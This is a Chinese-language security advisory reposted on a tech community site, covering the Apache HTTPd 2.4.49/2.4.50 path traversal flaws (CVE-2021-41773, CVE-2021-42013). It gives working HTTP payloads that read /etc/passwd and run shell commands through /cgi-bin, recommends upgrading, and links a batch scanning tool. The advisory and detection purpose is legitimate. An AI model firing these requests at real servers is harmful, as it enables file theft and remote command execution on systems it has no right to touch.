前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Apache 2.4.49 (CVE-2021-41773) 、 2.4.50 (CVE-2021-42013) 检测工具

Apache 2.4.49 (CVE-2021-41773) 、 2.4.50 (CVE-2021-42013) 检测工具

作者头像
用户8478399
发布2022-09-22 19:42:44
5150
发布2022-09-22 19:42:44
举报
文章被收录于专栏:White OWLWhite OWL

以下文章来源于InBug实验室 ,作者InBug实验室

漏洞描述

Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新,披露了CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 路径穿越漏洞。由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善,攻击者可构造恶意请求绕过补丁,利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服务器。

影响版本

Apache HTTPd 2.4.49/2.4.50版本

验证过程

Apache HTTPd 2.4.49 任意文件读取漏洞验证:

GET数据包:

代码语言:javascript
复制
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: host
Content-Length: 2

Apache HTTPd 2.4.49 命令执行测试,未能成功回显命令,回显了bash报错信息。

POST数据包:

代码语言:javascript
复制
POST /cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh HTTP/1.1
Host: host
Connection: close
Content-Length: 13
 
echo;ifconfig

Apache HTTPd 2.4.50 命令执行测试:

代码语言:javascript
复制
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: host
Connection: close
Content-Length: 13
 
echo;ifconfig

一个图片总结这次ApacheHTTPd 2.4.50版本修复不完善。

修复建议

建议使用Apache HTTPd 2.4.49 与Apache HTTPd 2.4.50 版本的服务器更新Apache HTTPd 版本至最新。

检测工具

Apache 2.4.49 (CVE-2021-41773)

Apache 2.4.50 (CVE-2021-42013)

批量多线程检测工具:

Github地址:

https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2022-02-15,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 White OWL 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • Apache 2.4.49 (CVE-2021-41773)
  • Apache 2.4.50 (CVE-2021-42013)
  • 批量多线程检测工具:
相关产品与服务
检测工具
域名服务检测工具(Detection Tools)提供了全面的智能化域名诊断,包括Whois、DNS生效等特性检测,同时提供SSL证书相关特性检测,保障您的域名和网站健康。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档